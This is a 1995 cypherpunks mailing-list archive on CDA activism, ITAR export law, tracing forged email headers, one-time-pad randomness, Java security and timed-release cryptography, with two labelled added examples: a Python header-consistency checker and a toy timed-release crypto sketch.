>		Managers Amendment and the CDA from the Telecommunications
>		Deregulation bill
>Aug  4, '95	House passes HR1555 which goes into conference with S652.
>Aug  4, '95	House votes to attach Managers Amendment (which contains
>		new criminal penalties for speech online) to
>		Telecommunications Reform bill (HR1555).
>Aug  4, '95	House votes 421-4 to attach HR1978 to Telecommunications
>	 	Reform bill (HR1555).
>Jun 30, '95	Cox and Wyden introduce the "Internet Freedom and Family
>		Empowerment Act" (HR 1978) as an alternative to the CDA.
>Jun 21, '95     Several prominent House members publicly announce their
>                opposition to the CDA, including Rep. Newt Gingrich (R-GA),
>                Rep. Chris Cox (R-CA), and Rep. Ron Wyden (D-OR).
>Jun 14, '95     The Senate passes the CDA as attached to the Telecomm
>                reform bill (S 652) by a vote of 84-16.  The Leahy bill
>                (S 714) is not passed.
>May 24, '95     The House Telecomm Reform bill (HR 1555) leaves committee
>                in the House with the Leahy alternative attached to it,
>                thanks to Rep. Ron Klink of (D-PA).  The Communications
>                Decency Act is not attached to it.
>Apr  7, '95     Sen. Leahy (D-VT) introduces S.714, an alternative to
>                the Exon/Gorton bill, which commissions the Dept. of
>                Justice to study the problem to see if additional legislation
>                (such as the CDA) is necessary.
>Mar 23, '95     S314 amended and attached to the telecommunications reform
>                bill by Sen. Gorton (R-WA).  Language provides some provider
>                protection, but continues to infringe upon email privacy
>                and free speech.
>Feb 21, '95     HR1004 referred to the House Commerce and Judiciary
>                committees
>Feb 21, '95     HR1004 introduced by Rep. Johnson (D-SD)
>Feb  1, '95     S314 referred to the Senate Commerce committee
>Feb  1, '95     S314 introduced by Sen. Exon (D-NE) and Gorton (R-WA).
>
>________________________________________________________________________
>FOR MORE INFORMATION
>
>Web Sites
>        URL:http://www.vtw.org/exon/
>        URL:http://epic.org/
>        URL:http://www.eff.org/pub/Alerts/
>        URL:http://www.cdt.org/cda.html
>	URL:http://outpost.callnet.com/outpost.html
>
>FTP Archives 
>        URL:ftp://ftp.cdt.org/pub/cdt/policy/freespeech/00-INDEX.FREESPEECH
>        URL:ftp://ftp.eff.org/pub/Alerts/
>
>Gopher Archives:
>        URL:gopher://gopher.panix.com/11/vtw/exon
>        URL:gopher://gopher.eff.org/11/Alerts
>
>Email:
>        vtw@vtw.org (put "send alert" in the subject line for the latest
>		alert, or "send cdafaq" for the CDA FAQ)
>        cda-info@cdt.org (General CDA information)
>        cda-stat@cdt.org (Current status of the CDA)
>
>________________________________________________________________________
>LIST OF PARTICIPATING ORGANIZATIONS
>
>In order to use the net more effectively, several organizations have
>joined forces on a single Congressional net campaign to stop the
>Communications Decency Act.
>
>American Civil Liberties Union * American Communication Association *
>American Council for the Arts * Arts & Technology Society * Association
>of Alternative Newsweeklies * biancaTroll productions * Boston
>Coalition for Freedom of Expression * Californians Against Censorship
>Together * Center For Democracy And Technology * Centre for Democratic
>Communications * Center for Public Representation * Citizen's Voice -
>New Zealand * Cloud 9 Internet * Computer Communicators Association *
>Computel Network Services * Computer Professionals for Social
>Responsibility * Cross Connection * Cyber-Rights Campaign * CyberQueer
>Lounge * Dutch Digital Citizens' Movement * ECHO Communications Group,
>Inc. * Electronic Frontier Canada * Electronic Frontier Foundation *
>Electronic Frontier Foundation - Austin * Electronic Frontiers
>Australia * Electronic Frontiers Houston * Electronic Frontiers New
>Hampshire * Electronic Privacy Information Center * Feminists For Free
>Expression * First Amendment Teach-In * Florida Coalition Against
>Censorship * FranceCom, Inc. Web Advertising Services * Friendly
>Anti-Censorship Taskforce for Students * Hands Off!  The Net * Inland
>Book Company * Inner Circle Technologies, Inc. * Inst. for Global
>Communications * Internet On-Ramp, Inc. * Internet Users Consortium *
>Joint Artists' and Music Promotions Political Action Committee * The
>Libertarian Party * Marijuana Policy Project * Metropolitan Data
>Networks Ltd. * MindVox * MN Grassroots Party * National Bicycle
>Greenway * National Campaign for Freedom of Expression * National
>Coalition Against Censorship * National Gay and Lesbian Task Force *
>National Public Telecomputing Network * National Writers Union * Oregon
>Coast RISC * Panix Public Access Internet * People for the American Way
>* Republican Liberty Caucus * Rock Out Censorship * Society for
>Electronic Access * The Thing International BBS Network * The WELL *
>Voters Telecommunications Watch
>
>(Note: All 'Electronic Frontier' organizations are independent entities,
> not EFF chapters or divisions.)
>
>________________________________________________________________________
>	End Alert
>========================================================================
>
>

********************************************************************
Lynne L. Harrison, Esq.
Poughkeepsie, New York 
lharrison@mhv.net

"Say not, 'I have found the truth', but rather, 'I have found a truth.'"
                         - Kahlil Gibran from "The Prophet"
********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 7 Nov 1995 13:33:54 +0800
To: cypherpunks@toad.com>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <199511070208.VAA14762@jekyll.piermont.com>
Message-ID: <9511070341.AA15892@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Perry chips in :
>"Peter D. Junger" writes:
>> The trouble is that the ITAR's definition of export that is relevant
>> to cryptographic software has nothing to do with exporting in the
>> normal sense, and therefore it has nothing to do with transhipments.

>I am starting to have trouble believing you are a lawyer. Are you
>actually telling me that treaties which explicitly indemnify
>transshipment customers against local laws are superseded by lower
>level laws, in spite of the supremacy clause of the constitution? That
>might be what the state department would tell you, but I'd have
>trouble believing even a lobotomized mongoloid judge would let that
>stand. Treaties are treaties, period.

Actually there are exclusion clauses in most international trade treaties
to exclude items such as arms and drugs from transhipment clauses.
There are also various treaties to control traffic in arms and drugs whose
provisions may have precedence.

The US is not known for sticking to the narrow wording of an international
treaty in such cases. Panama was invaded for alleged transhipment of drugs
after all. I doubt anyone would seriously attempt to find a justification
for that act in international law. 

One of the many problems in Perry's approach is that an international treaty
is in essence a contract between governments. If the governments chose
to interpret a contract in a particular way they may not consider it any of
your business as a third party. They are after all always free to
negotiate a new treaty.


Perry's somewhat offensive language is not a substitute for an argument.
Treaties certainly aren't "treaties period" otherwise the profession of
law would be a somewhat less skilled one. There is clearly considerable
complexity in the interpretation of treaties and in determining the
scope of their application, the various remedies they provide for and so
on. 

I think I would take Perry's disbelief that a person is a lawyer because
he disagrees with him as reflecting more on Perry than anyone else.
All contrary views are rejected... hmm...


	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Tue, 7 Nov 1995 08:28:10 +0800
To: cypherpunks@toad.com
Subject: Re: DejaNews all over again--a URL for Usenet Searching
In-Reply-To: <acc3adfa0702100476eb@[205.199.118.202]>
Message-ID: <47m326$349@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <acc3adfa0702100476eb@[205.199.118.202]>,
Timothy C. May <tcmay@got.net> wrote:
> I usually avoid passing on URLs of interesting sites, in the name of
> conserving bandwidth (*), but this one really has me jazzed:
> 
> http://dejanews.com/

Equally interesting is the author profile feature.  They don't provide
a perfectly convenient way to access it, so use this form.

<head>
<title>DejaNews author profile quickskip</title>
</head>
<body>

<form action="http://marge.dejanews.com/cgi-bin/dnauthor-profile.tcl">
<p><input type=text size=64 name=author value="shields@tembel.org"></p>
<p><input type=submit></p>
</form>

<p>DejaNews is here</p>

</body>
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Sommerfeld <sommerfeld@orchard.medford.ma.us>
Date: Tue, 7 Nov 1995 13:40:23 +0800
To: perry@piermont.com
Subject: Re: forging headers
In-Reply-To: <199511070255.VAA14851@jekyll.piermont.com>
Message-ID: <199511070353.DAA01678@orchard.medford.ma.us>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> You didn't send ALL the headers, only some of them. You need to send
> on the full set to make a trace possible.

More specifically, the headers which are most needed are the Received:
and Message-Id: headers; each mailer along the path adds another
Received; header, typically with its name, a timestamp, and sometimes
the name or address of the previous system.  

Other headers may also help.

> Lee Tien writes:
> > So I got this message.  How would someone identify the sender of this
> > message?  I'm writing an article on anonymity, with some discussion of
> > remailers, and want to argue that forging already permits people to raise
> > the costs of tracing significantly, anonymous remailers or no.  

						- Bill

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBMJ7YHrT+rHlVUGpxAQHfSgP/YDoEM9chlFLNZ1U4nzh6T13Lsswqv768
oTpssqzW+OYenKgop7FOGYIs7GpSdSGdgFyucYHlcBkUpVXOLMcs/pylwIVGy8Hl
T/lrsNEjAEBjWlzZO6jSuKvrODZKGGfn7nTvmmCR8vKRtUlLnK3ljK8VphqpYvbm
Nmg6okhczZM=
=JO4Z
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 7 Nov 1995 22:31:08 +0800
To: hallam@w3.org
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <9511070341.AA15892@zorch.w3.org>
Message-ID: <199511070400.XAA14905@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@w3.org writes:
> One of the many problems in Perry's approach is that an international treaty
> is in essence a contract between governments.

Were that the case, citizens couldn't sue to have provisions impacting
them enforced, but the fact of the matter is that they can.

> Perry's somewhat offensive language is not a substitute for an argument.

Thank you for the ad hominem.

> I think I would take Perry's disbelief that a person is a lawyer because
> he disagrees with him as reflecting more on Perry than anyone else.

I'm not entirely sure that the international telecoms treaties cover
this, but both the gentleman I was conversing with and I appeared to
have assumed for purposes of discussion that they did. Given that, the
notion that international telecoms treaties are superseded by the
ITARs does indeed give one pause to wonder.


Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Tue, 7 Nov 1995 22:38:58 +0800
To: tien@well.sf.ca.us (Lee Tien)
Subject: Re: forging headers
In-Reply-To: <199511070249.SAA14921@well.com>
Message-ID: <199511070404.XAA04542@homeport.org>
MIME-Version: 1.0
Content-Type: text


You need to send the entire headers, including such things as received
lines.  Looking over those lines carefully will probably provide some
clues.

eg:
>From owner-cypherpunks@toad.com  Sun Sep 24 20:14:32 1995
>Return-Path: owner-cypherpunks@toad.com
>Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by
>homeport.org (8.6.9/8.6.9) with ESMTP id UAA18842 for
><adam@homeport.org>; Sun, 24 Sep 1995 20:14:30 -0400
>Received: from toad.com by relay3.UU.NET with SMTP 
>        id QQziqi14036; Sun, 24 Sep 1995 20:10:07 -0400
>Received: by toad.com id AA02191; Sun, 24 Sep 95 17:05:32 PDT
>Received: from crypto.com by toad.com id AA02182; Sun, 24 Sep 95
>17:05:26 PDT
>Received: from tpc.crypto.com by crypto.com Sun, 24 Sep 1995 20:16:16
>-0400
>Message-Id: <199509250016.UAA19204@crypto.com>


| So I got this message.  How would someone identify the sender of this
| message?  I'm writing an article on anonymity, with some discussion of
| remailers, and want to argue that forging already permits people to raise
| the costs of tracing significantly, anonymous remailers or no.  
| 
| Lee
| 
| >From: freeh@fbi.gov
| >Date: Tue, 24 Oct 95 16:07:08 -0400
| >Apparently-To: tien@well.sf.ca.us
| >X-UIDL: 814570964.056
| >
| >> How difficult is it to forge headers?  How difficult is it to trace a
| >> message to the actual sender if the header is forged?
| >
| >Not very difficult at all (to forge, that is).  This is a quick and dirty
| >example that should be somewhat traceable.  If you want pointers on how to
| >trace it, post the whole thing, including headers, to cypherpunks.



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume
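
The Received: tracing that Bill Sommerfeld and Adam Shostack describe in this thread, as an added example that is not part of either post: it parses the sample chain quoted above, walks it oldest hop first, and flags hops that do not link up or whose timestamps run backwards. The second header set, its example.* hosts, and all function names are constructed for illustration.

```python
import re
from datetime import datetime
from email import message_from_string
from email.utils import parsedate_to_datetime
from typing import List, NamedTuple, Optional

# The sample from the post above, re-folded with continuation whitespace
# (the quoted copy lost its indentation). File order is newest hop first.
SAMPLE = """\
Return-Path: owner-cypherpunks@toad.com
Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by
 homeport.org (8.6.9/8.6.9) with ESMTP id UAA18842 for
 <adam@homeport.org>; Sun, 24 Sep 1995 20:14:30 -0400
Received: from toad.com by relay3.UU.NET with SMTP
        id QQziqi14036; Sun, 24 Sep 1995 20:10:07 -0400
Received: by toad.com id AA02191; Sun, 24 Sep 95 17:05:32 PDT
Received: from crypto.com by toad.com id AA02182; Sun, 24 Sep 95
 17:05:26 PDT
Received: from tpc.crypto.com by crypto.com Sun, 24 Sep 1995 20:16:16
 -0400
Message-Id: <199509250016.UAA19204@crypto.com>
"""

# Constructed sample, hypothetical hosts: the bottom line names a relay that
# the hop above it never saw, which is how a sender-supplied header shows up.
CONSTRUCTED = """\
Received: from dialup7.example.com by mx.example.org;
 Wed, 1 Nov 1995 16:07:30 -0500
Received: from mail.example.gov by relay.example.net;
 Wed, 1 Nov 1995 16:07:08 -0500
From: someone@example.gov
"""

HOP_RE = re.compile(r"(?:from\s+(?P<src>[^\s;]+).*?\s)?by\s+(?P<by>[^\s;]+)", re.I)
DATE_RE = re.compile(
    r"(?:[A-Za-z]{3},\s*)?\d{1,2}\s+[A-Za-z]{3}\s+\d{2,4}\s+\d{1,2}:\d{2}"
    r"(?::\d{2})?\s+(?:[+-]\d{4}|[A-Za-z]{1,5})\s*$")


class Hop(NamedTuple):
    src: Optional[str]        # previous system as recorded by the relay, if any
    by: str                   # relay that wrote this header
    when: Optional[datetime]  # timezone-aware timestamp, or None


def parse_hops(raw: str) -> List[Hop]:
    """Return the Received: hops oldest first."""
    hops = []
    for value in message_from_string(raw).get_all("Received", []):
        flat = " ".join(value.split())      # undo header folding
        m = HOP_RE.match(flat)
        if not m:
            continue                        # unparseable hop: skip, never guess
        d = DATE_RE.search(flat)            # date may lack the usual ';'
        try:
            when = parsedate_to_datetime(d.group(0)) if d else None
        except (TypeError, ValueError):
            when = None
        if when is not None and when.tzinfo is None:
            when = None                     # unknown zone name: not comparable
        hops.append(Hop(m.group("src"), m.group("by"), when))
    hops.reverse()                          # each relay prepends its header
    return hops


def linked(older: Hop, newer: Hop) -> bool:
    """True when the newer hop received from the relay that wrote the older."""
    expected = newer.src or newer.by        # no "from": hand-off on one host
    return expected.lower() == older.by.lower()


def check_chain(hops: List[Hop], skew_tolerance: int = 60) -> list:
    """Return (kind, older relay, newer side, seconds) findings."""
    findings = []
    for older, newer in zip(hops, hops[1:]):
        if not linked(older, newer):
            findings.append(("break", older.by, newer.src or newer.by, 0))
        if older.when is not None and newer.when is not None:
            delta = int((newer.when - older.when).total_seconds())
            if delta < -skew_tolerance:     # backwards: clock skew or fabrication
                findings.append(("clock", older.by, newer.by, delta))
    return findings


def furthest_consistent_origin(hops: List[Hop]) -> Optional[str]:
    """Walk back from the recipient's own relay; stop at the first break."""
    if not hops:
        return None
    i = len(hops) - 1
    while i > 0 and linked(hops[i - 1], hops[i]):
        i -= 1
    return hops[i].src or hops[i].by


if __name__ == "__main__":
    for name, raw in (("page sample", SAMPLE), ("constructed", CONSTRUCTED)):
        hops = parse_hops(raw)
        print(name, "path:", " -> ".join(h.by for h in hops))
        print("  findings:", check_chain(hops),
              "origin:", furthest_consistent_origin(hops))
```

On the page's sample the only finding is a backwards timestamp between crypto.com and toad.com, which is the kind of clock disagreement an analyst has to rule out before calling a hop fabricated. A chain that links up is necessary but not sufficient: every line below the first relay you trust can still have been supplied by the sender.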





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 7 Nov 1995 14:06:55 +0800
To: "Peter D. Junger" <junger@pdj2-ra.f-remote.cwru.edu>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <m0tCewB-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <199511070405.XAA14913@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Peter D. Junger" writes:
> "Perry E. Metzger" writes:
> 
> : I am starting to have trouble believing you are a lawyer. Are you
> : actually telling me that treaties which explicitly indemnify
> : transshipment customers against local laws are superseded by lower
> : level laws, in spite of the supremacy clause of the constitution? That
> : might be what the state department would tell you, but I'd have
> : trouble believing even a lobotomized mongoloid judge would let that
> : stand. Treaties are treaties, period.
> 
> What I am telling you, if you would pay attention, is that there is no
> transhipment involved.  The violation of the ITAR consists of
> disclosing information, not shipment.

Given that it is a non-U.S. national disclosing information to a
non-U.S. national, both being outside the U.S.'s borders, with their
only involvement with the U.S. being an incidental traversal of their
communications via U.S. telecoms networks, I would say that it would
be a case where the telecoms treaties would come into play.

> If a Frenchman on vacation in the Riviera shows a copy of PGP sourcecode
> to a German businessman there, that is literally a violation of the
> ITAR.

Where the hell did you get that idea?  The ITAR clearly does not apply
to foreigners disclosing things to each other outside the United
States. I've read it and I can't see how it could possibly be so
interpreted. I'm not a lawyer, but this interpretation is so bizarre
as to be almost untenable. I can clearly see that a U.S. person
talking about DES to a foreign person can be a violation under the
language in the regulations, but there is no way on earth to interpret
the regulations as applying to foreigners abroad talking to other
foreigners outside the U.S.

> Don't expect the ITAR to make any sense.  And don't think that you can
> apply logic to the ITAR and get logical results.  It doesn't work that
> way.

I was under the impression, though, that the words meant what they
said.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 7 Nov 1995 13:35:43 +0800
To: Alan.Pugh@internetMCI.COM (amp)
Subject: Re: using pgp to make an otp
In-Reply-To: <01HXC3AEU9BM91Y89B@MAIL-CLUSTER.PCY.MCI.NET>
Message-ID: <199511070407.XAA04557@homeport.org>
MIME-Version: 1.0
Content-Type: text


amp wrote:

| my point here is that _if_ pgp output is random enough, i wouldn't need
| hardware. even i, with my extremely limited programming skills could create
| a .cmd file or program that could be used as input for a stream cypher.

	PGP output is not random enough to be used for a one time pad.
The security of an OTP is *entirely* based on the quality of the random
numbers; they should come from some strong generator.  Building good
one time pads is tough, and usually not worth the effort.


Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@clark.net>
Date: Tue, 7 Nov 1995 22:12:37 +0800
To: cypherpunks@toad.com
Subject: it could be worse
Message-ID: <199511070410.XAA29659@clark.net>
MIME-Version: 1.0
Content-Type: text/plain




 ``According to the former head of Romania's secret police, Ion Mihai
Pacepa, there had been ten million microphones in a country of twenty-three
million people.  That would mean that nearly everyone had been listened to
and then blackmailed into listening and reporting on others.  A maze of
psychic tunnels led from one person to another.'' [Andrei Codrescu, "The
Hole In The Flag", pp. 21-22]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 7 Nov 1995 15:49:53 +0800
To: cypherpunks@toad.com
Subject: Re: Java insecurity - long - argumentative - you are warned.
Message-ID: <199511070722.XAA05390@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 6 Nov 1995, Dr. Frederick B. Cohen wrote:

> WARNING - THIS MESSAGE CONTAINS INFORMATION THAT MIGHT BE CONSIDERED AS
> A FLAME BY SOME READERS - IT IS LONG AND TEDIOUS - YOU ARE WARNED!

> > 4.2 Security in the Java Environment
> > 
> > Security commands a high premium in the growing use of the Internet
> > for products and services ranging from electronic distribution of
> > software and multimedia content, to "digital cash". The area of
> > security with which we're concerned here is how the Java compiler and
> > run-time system restrict application programmers from creating
> > subversive code.

[long list of important questions deleted ...]

Essentially, I think that all of this will distill to a single issue,
vis-a-vis Java or any other paradigm which wishes to represent itself as
*secure*.

Where is the security review role placed within the project development
life cycle?? 

Is it at Design Concept?  Or during Application Development?  Or is it
done last, after design completion, after all of the programming is
complete and the production people are involved in operational turnover. 

Or is it done at all?

This concept is not new, and should not present any problems to anyone in
the industry.  Even John Q. Public will understand it, if we use a simple
construction analogy. 

If you want to build a secure house, your security doesn't start AFTER the
house is built.  It has to start at a very early stage.  It starts before
the blueprints are made, when you specify that you want a concrete
windowless box located on a quiet street at the end of a cul-de-sac.  

That is simple and obvious. 

You certainly don't have *security* if after building a glass house on
Main Street, if after the design is finished, the footings have been
poured, and the key is about to be turned over to the occupant; if then,
as an afterthought you put a single strong deadbolt on the front door to
"secure" it. 

Anyone who can't or won't quite grasp this idea is either willfully
attempting to steer gullible individuals astray, or is congenitally
stupid. 

It's time to call a spade a spade. 

> What exactly does this mean?
> 
> > While all this checking appears excruciatingly detailed, by the time
> > the byte code verifier has done its work, the Java interpreter can
> > proceed knowing that the code will run securely. Knowing these
> > properties makes the Java interpreter much faster, because it doesn't
> > have to check anything. 

Yikes!!  I'll leave this for someone else to address.  This sounds to me
like a variation on virus scanning.  I think that there are far more
reputable virus experts than I who can comment and expand on *flaws* with 
that approach. 

> No runtime checking whatsoever.  Get past the supposed verifier, and you
> have free run of the machine.  A single verifier bug or inadequacy, and
> the world is unsafe for electronic commerce. 

As someone who *vividly* remembers October, 1987 and the near economic
meltdown which was BARELY averted by the Fed, a near meltdown which
occurred because of the interactions of systems far less intelligent or
complex than those we routinely utilize today, systems which directly
interface not only to each other, but have undocumented, non-predictable
interactions with "soft and wet" systems, I might have some serious
concerns. 

Then again, it is _only_ the economy, isn't it? 

> ASBESTOS SUITS MAY NOW BE REMOVED - FLAME OFF.
> 
> P.S.
> 
> When: Tuesday, November 7, 8AM
> Where: The Hilton, Washington D.C. (the CSI conference)
> The talk: 50 Ways to Attack Your World Wide Web Systems
> 
> If you want a chance to heckle - be there.

Drat ... I don't think that I'll be able to attend.  I've already got
a local presentation that I've pencilled in for tomorrow morning at
some god awfully early hour.  Then again, D.C. isn't quite my circuit.

I was hoping though for some clarification.  Are you THE Dr. Frederick
B. Cohen??  The one who originally coined the phrase "computer virus"
and who maintains the computer virus FAQ?

Are you THAT Dr. Frederick B. Cohen, and are you speaking publicly
in Washington, tomorrow as one of the keynote speakers?

If you are, I'd be interested as to whether you'll talk about the
recent gaping security hole in the existing installed Navigator code
base which I detailed to this list's subscribers. 

The one posted this last Friday the Thirteenth, that questioned
Netscape's wisdom in creating an experimental MIME object which does
not follow the usual HTTP request/response paradigm, but instead
allows a server to open and maintain a bi-directional communications
channel from server to client.

Effectively a non-password protected telnet into the heart of any
system, an open exploitable connection which penetrates proxy servers
and firewalls, and acts as an enhanced bi-directional
delivery/recovery mechanism?

I'd be very interested in the comments around that, especially since both
Netscape and AT&T (who distributes the software under its own brand name) 
have made an explicit "no comment".

I'd especially be interested in any post-session transcript. 

I also think that Elaine Garzarelli might be interested.  Especially since
she'll be addressing the nation and the public via the public television
airwaves this Friday evening. 

Or at least ... uhmmm ... I _think_ that's when her electronic daytimer
has her pencilled in ...




Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Tue, 7 Nov 1995 14:59:04 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: consumer products that make nice sources
In-Reply-To: <acc00caf110210040ee2@[205.199.118.202]>
Message-ID: <Pine.SOL.3.91.951106233235.10925A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 3 Nov 1995, Timothy C. May wrote:


> 
> I'd say they make poor sources. Far too large. A smaller source has better
> access to the detector without adding much to the overall background the
> user is exposed to. (I'm not saying low-level uranium or thorium sources
> are much of a hazard, but the fluence presented at the detector is very low
> for such an extended source.)
> 
> It depends on the detector type (alpha, beta, gamma, neutrino?), but high
> count rates can be obtained in a variety of ways. (Don't get too high a
> count rate, or the dead time characteristics of the pulse-height analyzers
> will introduce spurious correlations that decrease entropy--I mention this
> to show that even radiation detector sources of entropy have non-random
> issues to take into account.)


Gotta watch yourself around the physicist....

Most of the sources I mentioned are fairly anemic, however the Coleman 
lantern mantles are pretty good beta emitters.  I can get count rates 
approaching 1000 cpm on a tired GM tube detector with a beta window of 
unknown thickness.

Brad D.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Tue, 7 Nov 1995 12:26:41 +0800
To: cypherpunks@toad.com
Subject: Timed-release crypto and information economics
Message-ID: <47m82v$4p4@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

1. Method

In 1993, Timothy C. May posted a message to this list
<URL:http://www.hks.net/cpunks/cpunks-0/1460.html> with some thoughts on
time-release crypto.  I think his system is too complex.  Here I present
a cleaner model, and show how it can be used in several real-life ways.

In the May proposal, when you have a message to be encrypted, you
encrypt it with a session key, optionally split that key with an n-of-m
scheme, and then send the key into a network of escrow agents, which are
instructed to hold the message for a given period of time.  You then
hold onto the encrypted message, though you need not keep it secret.
Conceptually, you have encrypted a message and then remailed the key to
yourself in such a way that it will take X length of time to arrive.

I have a simpler, public-key plan.  When you want to keep a message
secret until date X, you ask your favorite crypto house to generate a
key pair and hold the secret key until date X.  You then encrypt your
message with the public key, and again hold onto the encrypted message.
N-of-m trust management can be implemented by secret-sharing your message
and encrypting each with a key generated by a different crypto house.

This method is clean, fully anonymous, and nearly stateless.

2. Economics

I've worked out a payment model for both the public and secret key, which
I think can be used for any sort of information in an information economy
not based on (increasingly unenforceable) intellectual property laws.

In this model, the creator of information charges enough to recover
his costs (call this price, the price available to the first buyers,
the "primary cost").  It is then possible for resellers to purchase
it and try to make a profit through multiple sales at a lower price.
If the reseller is hoarding the information, another one can step in,
pay the same initial rate, and try to do better.

This model seperates marketing of information from producing it, and gives
an easy way to profit from doing either.  Of course, it's possible to
conflate them into a information creator that sells directly to end-users.

Once you abstract this you'll notice that (a) it's much like existing
models for those who create information for hire, such as writers and
programmers who sign over copyright but could recreate the work; and
(b) it can be applied to many less extreme scenarios, such as where the
reseller makes the product available but under a restrictive licence.
I think this is the basic fabric of an information economy.

Applying it to the selling of timed-release pairs, the primary cost
of the public key is some nominal charge, and the primary cost of the
secret key is the amount required to judge whether or not it should be
released -- a trivial amount for time-based release but something more
for event-based release.  (A corollary is that you might pay the judging
fee for a secret key, and receive instead a certificate saying that it
cannot yet be released.)

3. Applications

* Bonds: You deliver $1000 in ecash to the issuer.  In returns it gives
  you a unique certificate redeemable for $1100, encrypted such that
  it may not be decrypted until the maturity date.  You also get a
  certificate saying that your encrypted bond is a bond, so that you
  may demonstrate fraud if you find something else once you decrypt
  it at maturity.  Essentially this is the same as creating a private
  corporate ecash bank.  Coupon bonds are a trivial extension.

* Retirement plans, cryonics funds, and wills: You encrypt your assets
  or your will in a custom event-based key, and archive it with your
  executor.

* Idea futures: You have a pair of key pairs generated, one for
  encrypting YES coupons, and the other for NO coupons.  Now anyone
  can generate and sell their own coupons, consisting of $1 in ecash
  encrypted with a YES or NO event-release key, again with a certificate
  of authenticity to verify fraud.

* Bonding: You pay $1001 for a reputable institution to give you a $1000
  bond encrypted in the event-release key based on your breech of
  contract, and its complementary negative key, and send you and the
  other party each one bond.  If you default on your contract, the
  injured party can ask the crypto house to release the default key;
  if you do not, you can ask the crypto house to release the other key.

4. Cypherpunks write code

I'll let everyone tear into this for a few days, and then I'll put up a
server for timed-release key generation, charging maybe c$1.  I'd like
to then enhance it to be capable of issuing bonds and loans denominated
in c$.  (I like the cyberbucks trial because it's officially play money,
so there aren't any regulatory burdens.)  This should be interesting.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJ6jgeyjYMb1RsVfAQHKPAP8CF8HAN3dPa0QaJ3knDuv5gKd2yIUE57G
icK5flsVOHcmq2+y3LkB8uCWBT1IxyoWv9I2u1yQbujYtttjgparCoCeErXk7uPe
h7yY/eZzx3wgIrGxMEGePZftwoA2aGfyO+wDy/5lPZ0yWxLpoLr67RfpWbutqinf
bmn6xeL64lg=
=iXOF
-----END PGP SIGNATURE-----
-- 
Shields.
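
An added example, not code from the original post: the public-key scheme of section 1, with each "crypto house" holding a secret key until date X and the message secret-shared n-of-m across houses. Textbook ElGamal over a Mersenne prime and Shamir sharing are toy stand-ins chosen here (not safe for real use), and `CryptoHouse`, `seal` and `unseal` are hypothetical names.

```python
import secrets
from datetime import datetime, timezone

P = 2**521 - 1   # Mersenne prime: toy modulus for both the shares and ElGamal
G = 3            # toy base; the post names no particular cryptosystem


class CryptoHouse:
    """Generates key pairs and withholds each secret key until its date."""

    def __init__(self, name):
        self.name = name
        self._keys = {}                       # key id -> (secret, release date)

    def new_key(self, release_at):
        secret = secrets.randbelow(P - 3) + 2
        key_id = len(self._keys)
        self._keys[key_id] = (secret, release_at)
        return key_id, pow(G, secret, P)      # only the public half leaves

    def request_secret(self, key_id, now):
        secret, release_at = self._keys[key_id]
        if now < release_at:
            return None                       # "cannot yet be released"
        return secret


def encrypt(public, m):
    """Textbook ElGamal on an integer 0 <= m < P."""
    k = secrets.randbelow(P - 3) + 2
    return pow(G, k, P), (m * pow(public, k, P)) % P


def decrypt(secret, ciphertext):
    c1, c2 = ciphertext
    return (c2 * pow(c1, P - 1 - secret, P)) % P   # c1^(-secret) mod P


def split(value, n, m):
    """Shamir n-of-m: points on a random degree n-1 polynomial over GF(P)."""
    coeffs = [value] + [secrets.randbelow(P) for _ in range(n - 1)]
    return [(x, sum(c * pow(x, i, P) for i, c in enumerate(coeffs)) % P)
            for x in range(1, m + 1)]


def combine(shares):
    """Lagrange interpolation at x = 0."""
    total = 0
    for xi, yi in shares:
        num = den = 1
        for xj, _ in shares:
            if xj != xi:
                num = num * -xj % P
                den = den * (xi - xj) % P
        total = (total + yi * num * pow(den, P - 2, P)) % P
    return total


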